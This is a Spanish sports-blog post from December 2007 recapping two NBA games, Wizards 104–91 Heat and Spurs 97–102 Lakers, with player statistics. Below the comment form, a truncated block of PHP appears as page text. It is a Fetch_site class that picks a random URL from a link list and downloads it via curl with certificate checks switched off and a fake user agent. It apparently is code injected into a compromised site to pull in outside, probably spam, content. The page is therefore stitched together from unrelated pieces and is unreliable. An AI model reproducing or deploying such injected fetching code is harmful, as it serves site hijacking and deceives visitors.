La crónica (13/12/07)

14 de December de 2007 por MagicJohnson32

La madrugada del jueves al viernes nos dejó dos partidos que bien podrían ser eliminatorias de Playoffs… si es que los Heat despiertan. Los de Miami cayeron de nuevo en casa, algo que se ha convertido en costumbre, ante unos Wizards que se las arreglan para ir sumando victorias sin Gilbert Arenas. Cuatro husos horarios hacia el Oeste, los Spurs visitaron a los Lakers sin Duncan ni Parker, por lo que ya hicieron bastante dando guerra a unos Lakers que sumaron así su cuarta victoria consecutiva.

Tras el resumen en imágenes de lo acontecido anoche, os dejamos con las crónicas:

rileywizardsWizards 104 – 91 Heat

Si los Wizards anotan más de 100 puntos, acostumbran a ganar. Y si DeShawn Stevenson anota 26, lo normal es que Washington se vaya a más de 100. Stevenson lideró la victoria de los Wizards, que se ponen con un balance de 12-10, en pista de los Heat, un equipo que sólo ha ganado 2 de los nueve partidos que ha disputado como local esta temporada. Miami, pese a los 22 puntos de Chris Quinn, volvió a ofrecer una triste imagen y se ganó las críticas de Riley, que aseguró estar profundamente decepcionado con su equipo. Por mucho que O’Neal esté lejos de ser el gran dominador que fue en su día, no es normal que Haywood juegue mejor que él, que disponga de más tiros que él, que atrape más rebotes… Y por mucho que Wade salga de una lesión, no es normal que Udonis Haslem sea el mejor de este equipo. El PF logró 19 puntos y 11 rebotes, y fue el heat que más lanzó a canasta (8 de 15 en tiros). Wade hizo 17 puntos, 7 rebotes y 7 asistencias, pero perdió 8 balones. Desde el banco llegaron los 22 puntos de Quinn y 16 de Ricky Davis, pero no fueron suficientes ante Stevenson y el trío Butler-Jamison-Haywood; los tres firmaron sendos dobles-dobles y acumularon 47 puntos y 36 rebotes.

Spurs 97 – 102 Lakerskobespursstaples

Los equipos campeones demuestran su categoría incluso en las derrotas. San Antonio se presentó anoche en el Staples Center sin Tim Duncan ni Tony Parker, y además no contó con un buen partido de Manu Ginóbili. Aun así, los Spurs fueron capaces de hacer sufrir a unos Lakers al alza, que necesitaron de un buen último cuarto y un parcial de 18-5 para imponerse y situar su balance en 13 victorias y 8 derrotas. Como era de prever, San Antonio apostó por la defensa como principal arma y ambos equipos se movieron en porcentajes bajos (ninguno llegó al 45%). Los texanos aguantaron tres cuartos gracias al acierto exterior de Bowen (5 triples), Barry (3), Horry y Finley (2 cada uno), así como a la lucha bajo los aros de Fabri Oberto, que logró su mejor marca reboteadora con 16 capturas. Pero Lakers volvió a mostrarse como un equipo de recursos ofensivos y, pese a que sólo Bryant y Odom superaron la decena, todos los jugadores lograron al menos 5 puntos. Kobe finalizó con 30 (10 de 24 en tiros), 7 rebotes, 4 robos y 3 asistencias, y Odom firmó 15-8. Por su parte, Bynum se quedó en 6 puntos y 11 rebotes tras ser expulsado por primera vez en su carrera al recibir dos técnicas mediado el tercer cuarto.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>